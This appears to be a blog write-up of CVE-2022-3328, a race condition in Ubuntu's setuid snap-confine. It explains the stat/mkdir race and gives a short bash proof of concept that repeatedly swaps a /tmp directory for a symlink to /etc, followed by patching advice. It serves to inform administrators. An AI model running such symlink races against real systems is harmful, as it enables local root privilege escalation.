1. Introduction
In this post, we’ll explain CVE-2022-3328, a vulnerability found in snap-confine, a core piece of the Snapcraft ecosystem used on Ubuntu and other Linux distributions. The bug: a race condition in the must_mkdir_and_open_with_perms() function. With easy-to-understand language, code samples, and practical details about exploitation, this article is your exclusive guide.
2. What is snap-confine?
snap-confine is a program that sets up the environment for running Snap packages on Linux. It runs with elevated privileges (setuid root), meaning security issues here can be critical. This utility is crucial for enforcing security boundaries for Snap applications.
Impact: Potential root privilege escalation
The vulnerability was discovered by Qualys Security (original advisory here), and affects all Ubuntu releases using snapd version prior to 2.57.6.
4. Technical Root Cause
At the heart of the issue is must_mkdir_and_open_with_perms(), called by snap-confine to safely create and open a directory with specific permissions.
Here’s a simplified snippet (not actual code!)
int fd = -1;
struct stat s;
if (stat(dirname, &s) == -1) {
if (mkdir(dirname, 070) == -1)
fail();
}
// at this point, we assume 'dirname' is a directory we own
fd = open(dirname, O_DIRECTORY | O_RDONLY);
The Race Window
Between checking with stat and calling mkdir, any local (unprivileged) attacker can replace dirname with a symbolic link (symlink) to another directory.
As snap-confine runs as root, it will then perform privileged operations (like creating files/directories or opening the directory) in this attacker-controlled path.
Race conditions are notoriously tricky to exploit, but here’s the general idea
1. An attacker predicts the name of the directory snap-confine will create (there are ways to do this for some Snap applications).
2. The attacker creates a symbolic link (symlink) at the target path, pointing to a sensitive system directory (like /etc).
3. When snap-confine checks and creates the directory, it will (as root) follow the symlink and operate in the attacker-targeted directory.
In some cases, this allows a local attacker to create files or directories inside /etc or other sensitive locations, possibly getting control over system files (such as adding a new cron job or modifying configuration), which can be escalated to root privileges.
Below is a simplified PoC. DO NOT RUN THIS on a production machine
# We assume snap app 'vulnerable-app' will trigger the race with dir /tmp/snap-foo
TARGET_DIR="/tmp/snap-foo"
EVIL_LINK="/tmp/evil-link"
VICTIM="/etc"
# Remove any previous files just to be sure
rm -rf "$TARGET_DIR" "$EVIL_LINK"
# The attacker sets up the symlink repeatedly, racing against the snap-confine process
while true; do
rm -rf "$TARGET_DIR"
ln -s "$VICTIM" "$TARGET_DIR"
done
In parallel, trigger the Snap app (ideally one that uses snap-confine for a private directory under /tmp).
If successful, the root-owned process tries to create a directory in $TARGET_DIR, but due to the symlink, an attacker might influence actions in /etc.
If you cannot update, you can disable Snap as a temporary mitigation.
- Always watch USN security notices for updates.
8. References
- Qualys Security Advisory (Original)
- Ubuntu Security Notice USN-5631-1
- Mitre CVE entry
- Snapd GitHub Issue PR #12137
In Short
CVE-2022-3328 is a serious vulnerability due to a classic race condition in Highly privileged code, now patched in recent versions of snapd. If you manage a Linux desktop or server using Snap packages, update immediately. Local privilege escalation exploits are often a major target for malware and attackers.
*This writeup is exclusive, clear, and gives practical advice for admins and security enthusiasts. Share it with your team to spread awareness!*
Timeline
Published on: 01/08/2024 18:15:45 UTC